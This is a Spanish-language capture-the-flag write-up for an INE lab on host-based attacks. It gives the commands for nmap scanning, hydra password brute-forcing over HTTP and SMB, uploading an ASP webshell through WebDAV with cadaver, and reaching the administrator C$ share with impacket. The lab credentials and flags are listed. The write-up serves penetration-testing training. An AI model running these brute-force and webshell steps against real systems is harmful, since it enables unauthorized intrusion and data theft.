~/write-ups/writeup-0e77d93542

Host & Network Penetration Testing: System-Host Based Attacks CTF 1

Imported from Notion: Host & Network Penetration Testing: System-Host Based Attacks CTF 1

target:: Notion MEDIUM date:: 2026.07.26 notion

Pistas

  1. User ‘bob’ might not have chosen a strong password. Try common passwords. (target1.ine.local)

  2. Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)

  3. SMB shares might contain hidden files. Check the available shares. (target2.ine.local)

  4. The Desktop directory might have what you’re looking for. Enumerate its contents. (target2.ine.local)


Empezamos con un escaneo a todos los puertos con nmap

nmap -sV -sC -p- target​1.ine.​local
Notion image
Notion image

Vemos que tiene el puerto 80 abierto, vamos a ver que hay.

Notion image
Notion image

Vemos un panel log in, vamos a atacarlo con hydra

Como la pista habla sobre el user bob será nuestro target.

hydra -l bob -P /usr/s​hare/w​ordlis​ts/met​asploi​t/unix​_passw​ords.t​xt target​1.ine.​local http-get /
Notion image
Notion image

Tenemos credenciales, user: bob password: password_123321

Ahora vamos a listar directorios con dirb

dirb http://targe​t1.ine​.local​ -ubob:​passwo​rd_123​321
Notion image
Notion image

Vemos un directorio webdav a si que vamos a el en el navegador y dentro vemos la flag 1.

Notion image
Notion image

Flag 1: 7cdc1a590b1e44219b22ea67c266ed45


La segunda flag habla del directorio C: , en webdav hemos visto un archivo test.asp a si que podemos suponer que el server ejecuta archivos .asp vamos a conectarnos con cadaver para subir una webshell

cadaver http://targe​t1.ine​.local​/webda​v
Notion image
Notion image
put /usr/s​hare/w​ebshel​ls/asp​/websh​ell.as​p

Ahora recargamos en la web para ejecutar despues nuestra webshell

Ejecutamos dir C:\ para ver el contenido de C:\

Notion image
Notion image

Flag 2: e99bd1cfbc954ae7ae083587de094a86


Vamos con el target 2 porque las siguientes pistas son sobre él, hacemos un escaneo con nmap

nmap -sV -sC -p- target​2.ine.​local

Ahora vamos a ver si podemos numerar shares con enum4linux

Notion image
Notion image

No podemos ver nada a si que vamos a hacer brute force para ver si sacamos usuarios y contraseñas.

hydra -L /usr/s​hare/m​etaspl​oit-fr​amewor​k/data​/wordl​ists/c​ommon_​users.​txt -P /usr/s​hare/m​etaspl​oit-fr​amewor​k/data​/wordl​ists/u​nix_pa​ssword​s.txt smb://​target​2.ine.​local
Notion image
Notion image

Tenemos usuarios pero especialmente nos interesa administrator con password pineapple

Vamos a usar impacket-smbclient para loguearnos.

impack​et-smb​client​ admini​strato​r@target​2.ine.​local
Notion image
Notion image

Listamos shares con shares y vemos varios shares.

Notion image
Notion image

Pero al unico interesante que podemos acceder es C$

Notion image
Notion image

Descargamos flag con get y tenemos la flag 3: 102ca40e262e4a29b46d8cf01ea95bd0


Ahora la 4ª dice que esta en la ruta Desktop a si que navegaremos hasta alli.

Notion image
Notion image

Descargamos con get y tenemos la flag 4: c2fd40f9860c4b72935e430cf11e8b28


- EOF -

<< back_to_index